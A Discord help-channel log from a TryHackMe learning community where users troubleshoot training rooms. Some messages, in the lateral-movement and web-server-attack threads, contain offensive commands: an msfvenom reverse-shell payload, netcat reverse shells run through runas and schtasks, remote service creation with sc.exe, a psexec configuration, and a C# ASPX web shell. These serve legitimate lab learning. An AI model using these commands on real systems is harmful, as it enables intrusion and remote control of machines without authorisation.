You may want to reach out to support@tryhackme.com in the meantime as likely will take a few days for response. Meantime, this would be a great thing for AI like GPT, you could copy-paste your screen outputs and describe your issue/results in realtime and likely get you moving forward - best of luck!

woeful bluff
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #203 - 55)

orchid rover
#

We will not help with the following but not limited to:

  • Account hacks/penetration testing
  • Blackmailing
  • Asking about account restoration
  • Game hacks or cheats
  • Revenge hacking
  • Cyberstalking
  • Take down services aka d/ddos attacks
  • Etc

We will not risk our own lives to help a stranger get their accounts back or perform tests by using illegal or unethical means. If support or someone is asking you to do this. Please refer them to the rules of this server and or the proper support pages for better help.

winged walrus
#

I cannot get my Firefox browser to accept the certificate to access the websites for the burpsuite room. I have it listed on there, but it’s still not letting me connect to the http, any ideas? OS is Ubuntu Linux as well.

remote wraith
#

what is the error message you are getting in your browser? is it actually saying it won't allow the site, or saying you cannot reach the site?

median shuttle
#

hello new to tryhackme

remote wraith
winged walrus
remote wraith
#

and OPENVPN is connected to THM? Not questioning your skills here, just throwing out issues I've seen in the past.

#

Not looking at the room, you aren't able to view any websites, or this there a website tied to the module that you can't visit? proxy in browser set to 127.0.0.1 : 8080?

shell cape
#

hello guys

when executing this command in a compromised web server:
http://ip:port/uploads/shell.php?cmd=cd /
it doesn't do anything. However one word commands like ls, hostname, whoami work.

cold flower
#

ls -la becomes ls%20-la

shell cape
rotund hollyBOT
#

Gave +1 Rep to @cold flower (current: #149 - 75)

shell cape
#

that does work however i tried cat%20shell.php or cat%20/ and it didn't work

cold flower
shell cape
restive forum
#

Extending Your Network task6Try sending a TCP packet from computer1 to computer3 to reveal a flag. I have do sendtpackage From computer 1 to computer 3 packet type TCP Data nothing

#

Goodmorning every one

jolly canyon
#

Guys I am stuck on the room vectara last task. it is supposed to be easy but i dont get what i have to do

earnest sun
#

or maybe it's a feature, not a bug 🙃

cold flower
earnest sun
rotund hollyBOT
#

Gave +1 Rep to @cold flower (current: #145 - 76)

earnest sun
#

just got a bit confused since the logo says Splunk Enterprise

placid shore
cold flower
#

Great practice in my opinion 👍

earnest sun
#

I've been labbing with Azure Sentinel quite a lot lately and just realised that Splunk can do everything I want with a lot more ease 😅 As it seems anyway

cold flower
fossil kraken
fossil kraken
mental summit
#

I am facing a problem with the room SOC metrics. Can anybody help?

#

??

earnest sun
frosty fern
#

Can someone help me join the 'Search Skills' Room please 🙏

remote wraith
hybrid oyster
#

Also stuck on vectara task 8, the attackbox can’t connect to target machine ip, anyone have any suggestions or workarounds? Tried going through openvpn and it times out

remote wraith
#

nmap or similar port scanner on the ip

hybrid oyster
rotund hollyBOT
#

Gave +1 Rep to @remote wraith (current: #3765 - 1)

iron marlin
#

Can anyone help me with the Wreath network challange?

The problem is even after starting the machine, the network does not show running in the corner.

That is why connecting with the VPN provided with the challange fails because the network is not up by itself.

Any help pls?

onyx bough
#

help with the last task "protocol drift" of the room vectara

was able to find secret keys but cant figure how to get the flag for hours

remote wraith
#

similar issues here, got some good progress, but didnt get to flag, finally just moved on to next set of rooms.

keen steeple
#

@remote wraith hi

#

@earnest sun Hi

uncut hill
#

@potent latch cant i buy only a monthly sub? i can only see free and TryHackMe Regular Yearly sub

potent latch
uncut hill
potent latch
rotund hollyBOT
#

Gave +1 Rep to @potent latch (current: #1 - 6194)

deep current
#

hello

#

how can I reach to tryhackme support

#

I am stucl at the room summit at course soc level 1 at the task sample5.exe

#

anyone to help or answer

lusty charm
#

Hello sou brasileiro tou começando agora

#

Poderiam me ajudar a hachear um jogo online

#

Tento isso faz algum tempo mais não tive sucesso

dusk sorrel
#

Am I allowed to ask for assistance on the last question of the Vectara room? The others were fairly easy to get thru, but this one is posing quite difficult. I've 'discovered' a number of items of interest in the output and I have some theories on what may need to be done, but absolutely nothing feels like it is actually getting me closer to the flag. I've been working on it for hours and hours and I'm pulling my hair out..

vagrant fern
vagrant fern
lusty charm
#

Oh, sorry.

pseudo wraith
#

I am working on the AICTF last question. Do I utilize the Empire and/or starkiller tools?

nocturne tinsel
#

Task 8 on the Vectara, how do we access the AI? I added the IP to the /etc/hosts and still it doesn't go anywhere.

#

I'm not doing something right lol

pseudo wraith
#

Well I'm probably way off lol.

nocturne tinsel
#

I just needed to drop the s, this cold is really kicking my butt.

pseudo wraith
#

this medbay agent sucks

median cipher
#

I fell off, but I'm back so I don't waste my subscription

vast sierra
#

Hi guys I stuck on vectara room last question i got the secret but can't get the flag
Can anyone give hint ?

woven pewter
#

hey folks,
i am currently in Tcpdump: The Basics room and need to work with tcmdump command,
however in the room they have shared non sudo user permission. How to change to root permission.
help!

hexed sun
#

Hi

ancient mesa
#

Hi, i got problem with room: https://tryhackme.com/room/detectingwebddos
Task 5 can not be absolved cause the link was broken: http://localhost:8000/en-US/app/search/search
This Link was established on the Desktop of the VM - as oyu can see here the Task: Open the Splunk instance using the shortcut on the Desktop, or access it directly at http://10.114.139.230:8000

Unable to connect
Firefox can’t establish a connection to the server at 10.114.139.230:8000.

Unable to connect
Firefox can’t establish a connection to the server at localhost:8000.

ip a: 10.114.139.230/18
ss -tuln | grep 8000 -> empty
ps aux | grep -i splunk
root 1083 97.8 2.9 337552 117980 ? Ssl 07:25 79:51 splunkd --under-systemd --systemd-delegate=yes -p 8089 _internal_launch_under_systemd
root 2530 0.0 0.3 135384 15032 ? Ss 07:26 0:00 [splunkd pid=1083] splunkd

No NGINX or Apache2 running - no /var/www ... available ...

Need Help plz - cause i need to clear the room 😛

primal pollen
manic dock
#

Markeshall N. Zawolo here.......Just joining......

rare bronze
#

did anyone completed the checkmate room?

#

checkmate new room anyone level 3?

vagrant fern
#

Haven't done the room myself, but when I checked, it seems to be using the payload generic/shell_reverse_tcp?

#

How about the non-staged payload?

#

Also, have you tried resetting the target?

pastel pecan
#

anyone can help me on the room "Checkmate", cant figure out how to solve

#

?

stray ginkgo
#

Hi

ashen crane
queen pulsar
radiant olive
nocturne tinsel
robust mural
#

has anyone solve the last challenge in checkmate, my wordlist has 1.6 million words

#

I reduces it to 800k

#

but thats still a lot

slim bison
slim bison
robust mural
#

@manu use cupp

#

YEAH I got it

#

finished

queen pulsar
pseudo dawn
#

Hello team, I need to verify my access to the 'Common Linux Privesc' environment.

When I try to log in with the default credentials (user3 / password), I get an authentication error. Could you please provide me with the updated password or the command needed to reset it?

Thank you for your assistance.

vale zinc
#

Hey everyone I'm having problems with the Linux cli basics.. When I do the find ~ -name mission_brief.txt command it gives me something completely different than the one on the lesson. Can someone tell me what I'm doing wrong, I've tried typing it a little different but still nothing

remote ruin
slim bison
worldly peak
#

hello guys

wise dune
#

guys Nmap Post Port Scans dont have attack box

wise dune
deep vessel
# wise dune

if you have nmap on your own device it may help

wise dune
#

some questions need file on attackbox

#

so i try open attackbox from other room together and then closed that room

#

its work that way

tough jewel
#

HI

deep vessel
#

need help for tryhackme exploitingad room anyone please

#

not getting meterpreter...Test connection works from target device to my dvice on same port but not getting meterpreter...

deep vessel
#

@wispy comet mods and staffs need help

vale zinc
#

@slim bison thank you I'll try that when I get home.

rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #195 - 57)

nocturne tinsel
remote ruin
#

👍

hard anchor
#

guys im trying to subscribe thm but this thing shows up everytime
We are unable to authenticate your payment method. Please choose a different payment method and try again.

potent latch
dull apexBOT
#
TryHackMe's Email

TryHackMe's support email address.

potent latch
vital river
#

@austere dagger following the CVE from Blaster room, in no way I get the pop up option to save the certificate somewhere on the pc, but rather the web page cannot load (not internet connection, I know), so I cannot really continue following this exact vulnerability. Is anyone facing the same issue?

vital river
#

It worked on machine restart

tropic heart
#

hello

strange charm
#

hello guys i need help on a
Snapped Phish‑ing Line task Let’s check if the attacker left any files exposed on the same website.
Navigate to the /data directory.
What is the name of the archive file? how do i proceed

versed vault
primal pollen
#

guys have something that we can add in msvenom to let the payload more stealth ? any addictional parameter

trim cobalt
#

Hey, I'm stuck on the Lateral Movement and Pivoting room (https://tryhackme.com/room/lateralmovementandpivoting) and could use some help.

Connected via SSH using credentials from http://distributor.za.tryhackme.com/creds:

ssh za\<random_user>@thmjmp2.za.tryhackme.com

I used the sc.exe method to move laterally to THMIIS. Generated my payload, had to explicitly set x64, otherwise msfvenom defaults to x86 and the service fails with error 1053

msfvenom -p windows/x64/shell/reverse_tcp -f exe-service LHOST=<MY_IP> LPORT=4009 -o my_service.exe

Uploaded it to THMIIS's ADMIN$ share:

smbclient -c 'put my_service.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' <Password>

Spawned a shell with t1_leonard' access token:

runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe <MY_IP> 4010"

Set up the listener and created/started the remote service from that shell:

sc.exe \\thmiis.za.tryhackme.com create Potatoes_Service binPath= "%windir%\my_service.exe" start= auto
sc.exe \\thmiis.za.tryhackme.com start Potatoes_Service

Got a reverse shell on THMIIS, but when I tried to grab the flag I got:

Sorry! You are still missing something. No flag for you yet. (7)
I also tried with scheduled tasks :

schtasks /s \\thmiis.za.tryhackme.com /RU "SYSTEM" /create /tn "AnotherTask" /tr "c:\tools\nc64.exe -e cmd.exe <MY_IP> 9999" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s \\thmiis.za.tryhackme.com /run /TN "AnotherTask"

Also got a shell, but still couldn't get the flag, different error code this time though (No flag for you yet (6).

I even retried everything by SSHing directly as t1_leonard.summers to stay as close as possible to the assumed breach scenario mentioned in the room.

I don't see any requirement in the room about a specific service or exe name to use. I'm probably missing something obvious. Does anyone know what's needed to actually get the flag?

#

sorry for the flood, had to give a proper rundown of where I'm at 😅

quick thistle
#

I still study

chilly flare
#

Hello everyone
How can I find my discoard token

analog heath
grim fractal
#

hi helo.. i'm stuck at Splunk 2 (BOTS ) room's 400 series question's 4th question. https://tryhackme.com/room/splunk2gcd5 after spending hours i managed to paste it but its not accepting! i have tried third party tools like cyberchef or other online/offline unicode unescape tools. i even have tried changing my keyboard to korean. nothing helps

TryHackMe

Part of the Blue Primer series. This room is based on version 2 of the Boss of the SOC (BOTS) competition by Splunk.

deep vessel
#

hlo hlo hlo

#

I need help regarding exploiting ad room task 5...Dont know why meterpreter shell isnt connecting back..tried test conenction from target device to mine..Its fine connection is coming but when I run shell nothing happens dont know why

#

I had followed exactly the same config as mentioned in the task description......

#

@hasty hazel and other mods at least review once

charred mauve
#

are your options configured correctly

#

can you show us

#

and a link to the room perchance

#

and any error you are getting

#

etc

#

we need a bit more info

#

i cant access the room since its premium..

#

@deep vessel

#

if you share the above info, im sure we can help

deep vessel
#

current state of meterpreter.

charred mauve
charred mauve
#

also your lhost, shouldnt that be an IP

#

its been a while since i used metasploit

deep vessel
deep vessel
charred mauve
#

msfconsole
use exploit/windows/smb/psexec
set LHOST 10.50.11.32
set RHOST 10.200.60.201
set SMBUser trevor.local
set SMBShare C$
set SMBPass :
run

#

can you try with something like this?

deep vessel
#

lemme try creating new shell with this then..

charred mauve
#

this what i found in a walkthrough for the room

charred mauve
#

or at least configure rhost

#

aka remote host

#

it looks like you only configured your local host

spark viper
#

Heya guys

#

Can someone teach me hacking in mobile

charred mauve
#

you want to hack on mobile?

spark viper
#

Yep

charred mauve
#

#start-here has some great resources, but its better to do this on a laptop or computer. just works a bit better

spark viper
#

I don't have them😅

charred mauve
#

Do you have a background in IT ?

#

or experience

spark viper
#

Nah I'm new to this stuff

charred mauve
#

then start with that

#

learn how windows works, how networking works

#

how linux works

#

active directory

#

a programming language

#

etc

tired crescent
#

Hi guys, I am current in the Active Directory Basics room but i currently have challenge with task 4 which is "managing users in AD". I saw in the demonstration image attach to the task the instructor login in as Phillip using the Power shell but i have tried all possible means to login in as phillip in the machine in the split screen section by the right hand side but i am unable to do so.

#

what i have tried so far: 1. i tried loggin in as phillip in th e power shell but it is now allowing to do so . 2. i logout of the machine but it is not allowing me to login as phillip

#

i will appreciate any help to get past this , thanks in advance .

deep vessel
tired crescent
deep vessel
tired crescent
rotund hollyBOT
#

Gave +1 Rep to @deep vessel (current: #3769 - 1)

tired crescent
#

or i need to rdp from my own personal machine

deep vessel
rotund hollyBOT
#

Gave +1 Rep to @deep vessel (current: #2448 - 2)

tired crescent
deep vessel
tired crescent
#

i am not using the attackbox i am using the other machine on tryhackme which is the window AD basic V3

tired crescent
deep vessel
vale zinc
tired crescent
rotund hollyBOT
#

Gave +1 Rep to @deep vessel (current: #1847 - 3)

wheat frost
#

Hello people!
I'm stuck in gobuster room, trying to pass it through my kali machine
I've installed dnsmasq and added the nameserver according to my machine IP, but can't succeed to enumerate the objective
I obviously have a stable connection to thm servers with openVPN

#

any sugestions?

#

Thx in advanced

slim bison
wheat frost
#

whole gobuster output?
[+] Url: http//www.offensivetools.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s

#

Progress: 0 / 1 (0.00%)
2026/05/18 11:37:27 error on running gobuster on http//www.offensivetools.thm/: unable to connect to http//www.offensivetools.thm/: Get "http//www.offensivetools.thm/": unsupported protocol scheme ""

#

I can't seem to expose the expected output since I guess it's part of the answer
I've been prompted to change the /etc/hosts config. I haven't givin it a try though

vale zinc
wheat frost
slim bison
wheat frost
deep vessel
#

even after adding nameserver you need to restart network manager..did you do it?

wheat frost
#

do you mean etc/init.d/dnsmasq restart ??
in such case, it's affirmative

#

both my machine (the one deployed for the room) and my internal VIP add pings are answering
pinging www.offensivetools.thm or offensivetools.thm give me "name or service not known"

#

the whole output for cat /etc/resolv-dnsmasq
cat /etc/resolv-dnsmasq nameserver ***
seems a bit different from the room's guidance, since it's lacking a whole "nameserver" line
maybe that could be it

slim bison
wheat frost
#

i had to download the wordlist from the repo😅
gobuster dns -d offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Incorrect Usage: invalid value "offensivetools.thm" for flag -d: parse error

#

well i'll give it a rest for today
thank you veyr much

burnt solar
#

anyone knoe the answer to room 3 task 2

slim bison
burnt solar
#

can i send a screenshot in dms

slim bison
#

Please share here to help others

woven tapir
#

Hi, I am doing Wirehsark: Traffic Analysis lab from SOC level 1, Network traffic analysis room.
In the nmap scans, 4th question, how do I know which port is open?

#

Could someone help with the concept behind it?

#

There are port 67, 68 and 69

#

I am not able to understand the concept, could you please help.

vernal stone
#

Hey I just started and I can't seem to get into the labs. I installed OpenVPN, imported it's files, connected it, launched the attack box http://(ip address).p.thmlabs., I've asked AI, All I get are ip google searches. I REALLY want to learn this stuff, but if I can't get to the labs../.there's no point

woven tapir
deft carbon
#

without giving me the answer, can someone please help me know what language will help me translate this section to get the flag?

deft carbon
grand star
#

need room help with Linux CLI basics

remote wraith
#

watchu trying to figure out?

grand star
#

ubuntu@dull apex:~$ cd Documents
ubuntu@dull apex:~/Documents$ find ~ -name mission_brief.txt
/home/ubuntu/Documents/.research/archive/mission_brief.txt
ubuntu@dull apex:~/Documents$

#

I'm supposed to find the path to the mission_brief; the room says <redacted-path> instead of .research/archive

#

so when I type in cd /.research/archive/ it says file not found

remote wraith
#

so the path is /home/ubuntu/Documents/.research/archive/mission_brief.txt

#

try "cat /home/ubuntu/Documents/.research/archive/mission_brief.txt"

grand star
#

no such file

remote wraith
#

not sure about that .research, normally a "." before file means it is hidden, but not sure if that applies to folders / directories. maybe try without the "."

#

so cat /home/ubuntu/Documents/research/archive/mission_brief.txt

grand star
#

ya should, that's what the room says and tha'ts what AI is saying but it's not working that way

bronze etherBOT
#

@grand star Please slow down. Further spam will result in a short timeout.

#

@grand star Please slow down. Further spam will result in a short timeout.

remote wraith
#

hmmmmm, could try ./home/ubuntu/Documents/.research/archive/mission_brief.txt

#

ill see if i can check out the room

#

paid room, don''t have the premium right now........varg

#

you could try going one step at a time, if ur in documents, try "cd .research" then "cd archive", then "cat mission_brief.txt"

#

or "ls" to see which folders are available for you to switch to directly from where you are currently at.

grand star
#

such bullshit

#

i was in timeout

remote wraith
#

might help break down the steps a bit to see where the prob is

grand star
#

if I do ls for documents it's logs, notes, reports

remote wraith
#

can you "cd .research"

grand star
#

I was trying to cut and paste to show you the log and it said I spammed

remote wraith
#

its hidden so might not show up

grand star
#

cd.research w/" or w/o doesnt owkr

#

command not found

bronze etherBOT
#

@grand star Please slow down. Further spam will result in a short timeout.

remote wraith
#

ls -a supposed to show hidden files

grand star
#

ok

#

found . .. .researrch logs notes reports

#

so the next would be cd.research but ....

remote wraith
#

ok so see if cd .research works, make sure a space between "cd ."

grand star
#

space worked

#

cd .research

remote wraith
#

cool nice

#

ok so now can cd archive

grand star
#

almost forgot wtf I was doing lol

#

then mission_brief.txt?

remote wraith
#

then "ls" again, should see the file

grand star
#

it pops up

remote wraith
#

if you see it , you can "cat mission_brief.txt" or whatever file name is

still sandal
#

Hlo i am doing pre security room (how the web works) “client-server basics” there is a exercise to do when i search the link www.iamlearning.thm/contact it says we cant find the site

#

Can please anyone help

remote wraith
#

got ur VPN on or using attackbox?

grand star
#

Deizl you're the man

remote wraith
#

no prob amigo!

grand star
#

sent you a friend request

still sandal
#

I m using virtual machine

#

Provided by thm inside rooms

remote wraith
still sandal
#

Ok i will try all

#

I tried all not working

remote wraith
#

also, did you get an IP for the machine? prob has a "start machine" that gives you an IP, then the "attackbox" is ur vm I believe

#

I can't see the room, but thats how most are

still sandal
#

Yes it gave me a ip

remote wraith
#

could try http://<IP>/contact or https://<ip>/contact

#

or just the IP and see if anything comes up

still sandal
#

Okh i will try

#

I searched the target ip adress and it say 405 method not allowed

remote wraith
#

hmmmm.......guess at least its seeing it if it says that, but not sure why it won't show up

still sandal
#

When i ping it says cannot resolve

remote wraith
#

if the attackbox has "nmap in the cli terminal, could port scan

verbal seal
#

did u add it to /etc/host

remote wraith
#

command would be nmap <ip> -p

#

was thinking that, but I would think it would tell you if thats the case on beginner room?

still sandal
#

No i didnt add

verbal seal
#

yeah it shoudl tell you

#

worth a try though

remote wraith
#

yep

grand star
#

honestly sounds like you aren't in the attack box and you're just in the regular website

#

I'd close the attack box, open it and make sure you don't clic out of it

#

worse case scenario, close the tab then open it cause I did that room and it was super easy so it sounds like you clicked out of it

remote wraith
#

Look at u Tulak, already coming up with the fixes......lol

#

but yah might b the case also

still sandal
#

Okh i will try starting machine again

#

Thanks for all of your helps

#

Can i send pics here

remote wraith
#

doesnt look like it

verbal seal
remote wraith
#

o nice, i was just trying to copy paste

still sandal
#

Where to add this token i m new

verbal seal
#

manage account

#

scroll down until you see discord token

#

under account details

still sandal
#

Hlo

#

Now i can send pictures thanks

still sandal
#

I completed the room by guessing answers are https and www.iamlearning.thm

#

Others had same problem too

idle sage
#

Anyone got some time to help me out? I am about to swear at someone for a room. Lateral Movement and Pivoting

cloud talon
#

Hi I'm having a problem with the owasp juice shop, in the web hacking fundamentals learning path, in the task 5 AH! don't look, Even if I download the package.json.bak from the site I don't get any flag from the site

frigid sinew
#

Hello, I'm new and eager to learn. I have some questions; can someone help me?

vagrant fern
wind scroll
#

Hey im from Germany have an IQ 146 and im Autistic, i learn now Python etc 🙂 make will money

warm ore
#

hello there 🙂

I have a question. How can I contact the creator of a room to report a problem on it ?

slim bison
torpid karma
#

"VPN ssm file not found error, can't download ovpn config" on kali how to fix it

slim bison
torpid karma
#

still shows vpn ssm file not found

slim bison
torpid karma
#

send in private can not send screenshots here

minor cedar
#

Hello everybody. Does anyone know if lost streak can be repaired with no streak freezes left and how if so

slim bison
minor cedar
#

Just created a new ticket,see how it goes further. Thanks for your advice

frail coral
#

who is a hacker here right now

remote wraith
#

lol.......Technically, guess you could say everyone or maybe noone? What u tryin to figure out?

raven pier
#

Helo

#

Is anyone hacker here

#

?

fathom rover
raven pier
#

I think my ex gf is trying to stalk me

#

I'm not confirm whose acc is thta

fathom rover
#

It's unethical

raven pier
#

How Abt in dm

robust mural
#

Wreath: I created a Socks Proxy for the jump server from my attacker machine, now Empire should beused, but I wondering me if Empire supports this proxy, or has anyone ever used proxyhchains with empire?

cosmic ruin
#

Hi, I'm new to cyber security, ready to learn and collaborate.

radiant pulsar
#

Hi, I'm new to cyber security, ready to learn and collaborate.

wispy cometBOT
#

Done!

orchid rover
#

@potent latch Thanks

rotund hollyBOT
#

Gave +1 Rep to @potent latch (current: #1 - 6198)

white dragon
#

Firefox in the Attack box no longer ships with foxyproxy. Is that intended?

potent latch
cloud oak
#

Security analysts play a significant role in an organisation’s _____? I want answer

#

Tell me guys

charred mauve
#

what room

white dragon
primal pollen
#

The VPN shows as connected but can't ping to the target machines. I've already tried changing the VPN server.. is THM undergoing maintenance or something?

storm orchid
#

Hello guys, a question regarding Voyage box,
I managed to connect to the target via ssh port 2222 , which i thought i would connect to mysql server but there was none.
I also managed to leak the username for joomla but ,bruce forcing did not work. i get false positives from hydra
What am i missing

slim bison
slim bison
primal pollen
#

idk something is not right.. im cant ping to any IP on vpn

slim bison
# primal pollen idk something is not right.. im cant ping to any IP on vpn

yes it's def something on your side - i can confirm all is well in the us-west-2 region from my system - looks like a great op to learn how to troubleshoot basic network connections;)

  └ PING 10.146.166.171 (10.146.166.171) 56(84) bytes of data.
    64 bytes from 10.146.166.171: icmp_seq=1 ttl=62 time=46.4 ms
    64 bytes from 10.146.166.171: icmp_seq=2 ttl=62 time=45.1 ms

    --- 10.146.166.171 ping statistics ---
    2 packets transmitted, 2 received, 0% packet loss, time 1002ms
    rtt min/avg/max/mdev = 45.135/45.772/46.410/0.637 ms


• curl -s http://10.146.166.171:8080
  └ <!DOCTYPE html>
    <html>
    <head>
        <title>Cat Sticker Shop</title>

pulsar pike
#

Hello, I am Prem and I’m just starting to learn Cybersecurity from scratch and I'm looking to connect with others in the field. I'd love to learn from your experience—do you have any advice or favorite communities for someone starting from day one?

primal pollen
summer pike
#

Hey there I am having a problem with the Moniker Link (CVE-2024-21413), I got the email to send but the directions aren't very clear, I am trying to modify the exploit.py to show capturing the file in responder, but everytime I get an error message this IP is not found, I changed it to the IP address of the attack box I think I am missing something here. I wish the directions were a little more clear

#

I guess what I am missing is what is the line #12 that I need to change

#

Okay I am doing \ the attack box IP something happened still not capturing

deep vessel
vocal goblet
#

anyone please me with one ctf i tried from last 2 days

primal pollen
white dragon
slim bison
white dragon
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #185 - 61)

slim bison
white dragon
chilly steppe
#

H

deep vessel
#

just need a small query solving or assist on content-discovery room of latest raffle event...on jr peneteration path

lilac trench
#

I'm doing SOC1 alert triage and I got the flag but when I try to put it in the answer it will only let me enter the "T" and nothing else I can't pass this part if I can't enter the flag what do I do?

lilac trench
#

the first the SOC dashboard

#

egnore me I'm an idiot I was answering the wrong one

lilac trench
#

NOW I AM AT THE PART WHERE I PUT THE FLAG IN AND IT WONT LET ME IT WANTS A DIFFERENT FLAG

#

THM{should_we_allow_github_for_devs?} THIS IS MY FLAG BUT WHEN I TRY TO PUT IT IN IT PUTS THE UNDERSCORE AFTER THE L THAN AGAIN 4 SPACES THAN AGAIN 3 SPACES

#

I'M WRONG THE UNDERSCORE IS AFTER THE S THAN BETWEEN THE L AND D AND AFTER THE D AND BETWEEN THE E AND A THAN TWO SPACES BETWEEN W AND G AND ONE MORE AFTER THE B AND IT CUTS OFF AT THE F

pallid hare
#

I’m on Guided Pentest: Web Task 6 trying to get a reverse shell. I already uploaded the web shell through the upload functionality, and it works when I use cmd=whoami. But as soon as I copy a reverse shell command using Netcat on port 4444, nothing happens.

I tried troubleshooting with AI and managed to send a single TCP packet, which arrived successfully. However, when I run the reverse shell, nothing happens. Even verbose mode shows that it is executing, but it never establishes a connection to Netcat for no apparent reason.

weak ruin
pallid hare
rotund hollyBOT
#

Gave +1 Rep to @weak ruin (current: #474 - 18)

weak ruin
deep vessel
#

anyone had done new content discovery roo???

latent sphinx
#

Hi

#

I need help 🥲

orchid rover
#

With?

slow parrot
# still sandal

I am also experiencing this issue. I tried terminating and restating the machine a couple times and even switched browsers and no dice

wide plank
#

anyone have an issue with the Active Directory Basics room? Specifically, Task 04, I cannot seem to change sophie's password even after i delegated authority to Phillip and logged in as Phillip then used both powershell scripts but kept getting denied. So, obviously I couldn't RDP into sophie's account.

deep vessel
wide plank
#

trying now thx

#

thank you!!!

drowsy quail
#

Anyhelp to escalate from svcadmin to system in Windows Jump room

old nest
#

Threat modelling for pentesters room is having some issue in the task 8 unable to get the flag even after correct answers

tired crescent
worn radish
#

Hello!
Room: Penetration Testing Frameworks. Task9, Last question.
Perhaps there was a mistake? I've tried various options, but nothing works.

lucid hare
#

same as andrey

primal pollen
#

Do u guys use I.A to help in some analysis that u cant see to solve the room that u are stuck? I feel dumb when i do this...

lucid hare
#

if you are smart enough then tell me the answer

limber inlet
#

how can i use the discord token?

unique minnow
unique minnow
crystal thorn
#

I'm having trouble with the Networking Concepts room. I've gotten to task 7, i started the VM, started the AttackBox, started Terminal in the AttackBox, connected IP but when I run the GET / HTTP/1.1 it gives me a bunch of text I can't make heads or tails of and when I try to hit Host: telnet.thm, nothing happens. Echo isn't helping much and I'm sadly getting kind of frustrated. Any help?

deep vessel
#

anyone did the content discover room from latest raffle event..Did you guys got answer to that vhost question??

crystal thorn
#

I didn't know there were videos, thank you.

slim bison
rotund hollyBOT
#

Gave +1 Rep to @crystal thorn (current: #3778 - 1)

craggy thorn
#

@slim bison

#

do you known anywhere else i could find this room write up : Operation Promotion

ashen crane
craggy thorn
#

@ashen crane can y provide any hints or clues (frm www-data to the user) , if y already solved it

ashen crane
pure ermine
#

What's with the third flag of room jump

runic ridge
#

hi

#

i have problem with Jump Challenge

#

I can't connect target machine

drowsy quail
#

Anyhelp to escalate from svcadmin to system in Windows Jump room

#

Anyhelp to crack kdbx or any methods to escalate in Forward room

winged ocean
signal mauve
#

Hello.

drowsy quail
#

So, for the third flag of Jump, I can say just look at the ||services|| and you will find the way through

urban elk
#

Lol what?

#

it's asking for ABBREV framework names

#

OFC ITS NOT ENGLISH WORDS

#

who designed this error handling

drowsy quail
#

Anyhelp to escalate from svcadmin to system in Windows Jump room
Anyhelp to crack kdbx or any methods to escalate in Forward room
Anyhelp to escalate from support to s...admin in Support room

urban elk
drowsy quail
urban elk
drowsy quail
#
keepass2john D...e.kdbx > hash
! D...e.kdbx : File version '40000' is currently not supported!

slim bison
drowsy quail
slim bison
drowsy quail
#

ok 🫡

alpine apex
candid jetty
#

I am facing a problem while solving the update JR penetration learning path -> Romm: Penetration Testing Frameworks -> task 9 second question: Your client is an e-commerce company with a web storefront, a mobile shopping app, and a payment processing system. Which combination of frameworks would you recommend to cover all three components? (comma-separrated)

candid jetty
stark oriole
#

All tickets collected ✅😗

tired apex
#

hi

terse dirge
#

Jump room the part dev_user → monitor_user is madness

smoky grail
vagrant fern
dull apexBOT
karmic spoke
rotund hollyBOT
#

Gave +1 Rep to @vagrant fern (current: #11 - 947)

karmic spoke
#

So yeah this is the problem while using Attackbox for Task 3 of Web Server Attack - II in the updated Jr.Penetration Tester Path, the issue is that there's no script named iis_shortname_scan.py in the opt directory of AttackBox

smoky grail
#

i dont even see the directory in /opt that it says to navigate to

#

I'll check my attackbox when i get there

karmic spoke
#

Yeah !!

smoky grail
#

yeah that script isnt even on the system either

#

that's definitely an issue

#

cant even get the github repository for ISS shortname Scanner to download onto the attackbox

karmic spoke
#

Yeah

smoky grail
#

thats just painful

karmic spoke
#

Anyways you can complete the task

#

But it feels useless without doing anything

smoky grail
#

i cloned the repository onto my machine so ill just use ssh. its just worrying that you cant do it on the attackbox

karmic spoke
#

You got the repo ?

#

I have my Kali machine too

smoky grail
karmic spoke
rotund hollyBOT
#

Gave +1 Rep to @smoky grail (current: #3778 - 1)

near ember
#

how is the best way to do the pre security path. (like how do you learn)

orchid rover
#

Just start learning

eternal mountain
#

hi everyone

#

I am having a problem in this room Penetration Testing Frameworks task 9 Question 2

primal pollen
#

What we need to have a write-up on website ?

smoky grail
eternal mountain
#

I tried the most logical ones and it didnt work

smoky grail
#

okay, so task 8 will have the answer youre looking for in regards to the first framework

#

the other two frameworks can be found in task 8 and 9

#

there's a couple that deal with storefronts and mobile, concentrate on the owasp since those deal with web based things. for payment processing, the room only goes over one framework

#

i spent a solid 20-30 minutes yesterday trying to find the storefront framework

eternal mountain
#

thank you man I am gonna try

smoky grail
#

read these two paragraphs carefully

#

Also the WASC Threat classification paragraph is also a good read

eternal mountain
#

I am gonna read it

#

now

smoky grail
#

@karmic spoke Im working through web server attack 2 and got to task 4 where it wants me to do a PUT to the server using that cmd.aspx file. Keep getting a 204 no content instead of the successful 201. Did you have this issue?

karmic spoke
#

Yeah same

#

I even tried to execute the shell and used whoami

#

It's working well in Attackbox but not in my machine

#

Still stuck in running whoami /priv

karmic spoke
smoky grail
#

i got the same thing on attackbox and on my machine

clear siren
#

How to get certificate on tryhackme?

orchid rover
smoky grail
# karmic spoke Notify if you somehow figure it out

I had to practically rewrite the C# code

<%
string cmd = Request.QueryString["cmd"];
if (!string.IsNullOrEmpty(cmd)) {
    var proc = new System.Diagnostics.Process();
    proc.StartInfo.FileName = "cmd.exe";
    proc.StartInfo.Arguments = "/c " + cmd;
    proc.StartInfo.UseShellExecute = false;
    proc.StartInfo.RedirectStandardOutput = true;
    proc.Start();
    Response.Write("<pre>" + proc.StandardOutput.ReadToEnd() + "</pre>");
}
%>```

but now whoami is giving the expected output
#

There were some weird funky hidden characters in the initial copy paste

gleaming oxide
smoky grail
#

ive had issues like that where ive had to restart the entire environment to fix it

#

@karmic spoke just finished the room. that was a doozy.

primal pollen